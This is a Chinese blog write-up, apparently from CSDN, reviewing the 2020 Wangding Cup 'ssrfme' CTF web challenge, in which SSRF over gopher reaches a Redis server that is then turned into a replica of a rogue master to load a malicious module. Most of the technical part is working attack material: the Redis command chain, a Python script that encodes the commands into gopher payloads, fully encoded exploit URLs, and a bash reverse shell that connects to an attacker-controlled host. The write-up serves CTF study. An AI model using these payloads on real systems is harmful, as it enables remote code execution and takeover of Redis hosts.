CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

最新推荐文章于 2022-11-02 09:01:52 发布
最新推荐文章于 2022-11-02 09:01:52 发布
阅读量3.2k 收藏 5
点赞数
分类专栏: CTF 文章标签: 安全漏洞 redis 安全 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40422959/article/details/106463823
版权

CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

思路:SSRF结合redis主从复制RCE

Tip:使用DNS重绑定绕过限制

参考笔记:redis

主服务器:192.168.8.103

从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙)

第一步:使用脚本redis-rogue-server伪装redis主服务器:

python3 redis-rogue-server.py --server-only

第二步:在自控服务器用nc监听端口4607

第三步:攻击

首先确认在redis上要执行的命令:

config set dir /tmp/
config set dbfilename exp.so
slaveof 192.168.8.103 21000
module load /tmp/exp.so
system.exec 'bash -i >& /dev/tcp/192.168.8.103/4607 0>&1'

其次用redis_rdsp_z.py脚本转换一下命令:

python redis_resp_z.py

redis_rdsp_z.py:

#!/usr/bin/env python
# -*-coding:utf-8-*-

import urllib
ip="192.168.8.104"
port="6379"
#有密码时加上下面的auth值
payload="gopher://"+ip+":"+port+"/_%2A2%0d%0a%244%0d%0aAUTH%0d%0a%247%0d%0a123.com%0D%0A"
#没密码时用下面的
#payload="gopher://"+ip+":"+port+"/_"
#命令的值中有空格就暂时先替换成${IFS},便于后面处理,如set 1 <qw er>写成set 1 <qw${IFS}er>。
cmd=[
     "config set dir /tmp/",
     "config set dbfilename exp.so",
     "slaveof 192.168.8.103 21000",
     "module load /tmp/exp.so",
     "system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
     "quit"
     ]


'''
     "config set dir /tmp/",
     "config set dbfilename exp.so",
     "slaveof 192.168.8.103 21000",
     "quit"
'''


'''
     "module load /tmp/exp.so",
     "system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
     "quit"
'''
def tran_rdsp(x):
        #这是前面空格暂时先替换成${IFS}的原因。
        x_split = x.split(" ")
        #加*,因为RDSP协议中,对于array,回复的第一个字节是*。
        cmd=""
        cmd+="*"+str(len(x_split))
        #加$,因为RDSP协议中,对于Bulk Strings,回复的第一个字节是$,顺便再把${IFS}换回空格。
        for i in x_split:
            cmd+="\r\n"+"$"+str(len((i.replace("${IFS}"," "))))+"\r\n"+i.replace("${IFS}"," ")
        cmd+="\r\n"
        return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(tran_rdsp(x))
    print payload

其三,将转换后的命令再URL编码一次:

gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

其四:攻击

第一种方式

#执行一次后,等几秒再执行一次,监听端即可收到shell。

#原因是:这里将所有命令一次性发过去,第一次执行时模块未加载完,反弹shell的命令执行失败。第二次执行时模块已加载,反弹shell的命令执行成功。

http://192.168.8.104:8080/index.php?url=gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

第二种方式

空格都用%2520替换,换行都用%250d%250a替换。依次执行下面三句即可执行命令:

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.8.103%252021000%250d%250aquit

http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.exec%2520id%250d%250aquit

#第三句中,system.exec id等可以执行,system.exec bash -i >& /dev/tcp/192.168.8.103/4607 0>&1执行失败;且system.rev报错无命令。
山下南徒
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2020 玄武]SSRFMe-反弹shell
2202_75361164的博客
04-09 346
- 因为用常规方法一直写不出来,所以就换了一种
2022年第三届“网鼎杯”网络安全大赛(玄武)【re557】
09-11
2022年第三届“网鼎杯”网络安全大赛(玄武)【re557】
buuctf [网鼎杯 2020 玄武]SSRFMe
qq_52671379的博客
04-23 3436
buuctf [网鼎杯 2020 玄武]SSRFMe
[网鼎杯 2020 玄武]SSRFMeredis主从复制ssrf】
whowhenhow5的博客
11-15 1403
参考博客: https://blog.csdn.net/qq_41891666/article/details/107103116 https://zhuanlan.zhihu.com/p/112055947 https://blog.csdn.net/weixin_42345596/article/details/111312263 属于是被buu恶心坏了,为什么这么多人说只能内网打呜呜呜 打开页面是一个php源码,大概是要绕过这个check_inner_ip,一看到这个parse_url直接根据这个函数
[网鼎杯 2020 玄武]SSRFMe
qq_43756333的博客
07-23 1293
平台:buuoj.cn 直接给出源码 <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($ur
BUU刷 [网鼎杯 2020 玄武]SSRFMe
weixin_48631429的博客
01-24 483
直接给了源码,提示本地访问hint.php DNS重绑定漏洞察看hint.php: url=http://0.0.0.0/hint.php 提示redispass is root ssrf 打redis。 直接利用工具 https://github.com/xmsec/redis-ssrf https://github.com/n0b0dyCN/redis-rogue-server 将ssrf-redis.py中的对应位置更改 将下面的exp.so和上面的rogue-server.py,ssrf-red
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-MISC关于各类编码习(湖工商扛把子)
最新发布
03-17
MISC章节关于各类编码的练习
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出人申请重新对过渡进行修改发布的权利,但对每个均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
网鼎杯 白虎.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎 线下赛 真 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
网鼎杯网络安全大赛玄武_经典的一道CTF-WriteUP-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1570
刚完整复现一遍redis,然后重新打了一下这道SSRF+本地redis主从复制RCE合拳拿shell 拿不到flag+反弹shell的惨案到此为止吧,跟我一步步拿shell,CTF-WriteUP-SSRFME redis漏洞利用姿势原文https://www.sec-in.com/article/1309 一、环境说明,buuoj靶场,https://buuoj.cn/ 攻击机kali-公网(普通的centos和ubuntu机子一样效果) 二、打靶机注意:现在buuoj的这台靶机已经可以出网了,有公
网鼎杯网络安全大赛玄武-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1549
网鼎杯网络安全大赛玄武-SSRFME index.php可绕过本地条件判断,以下是源码:
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值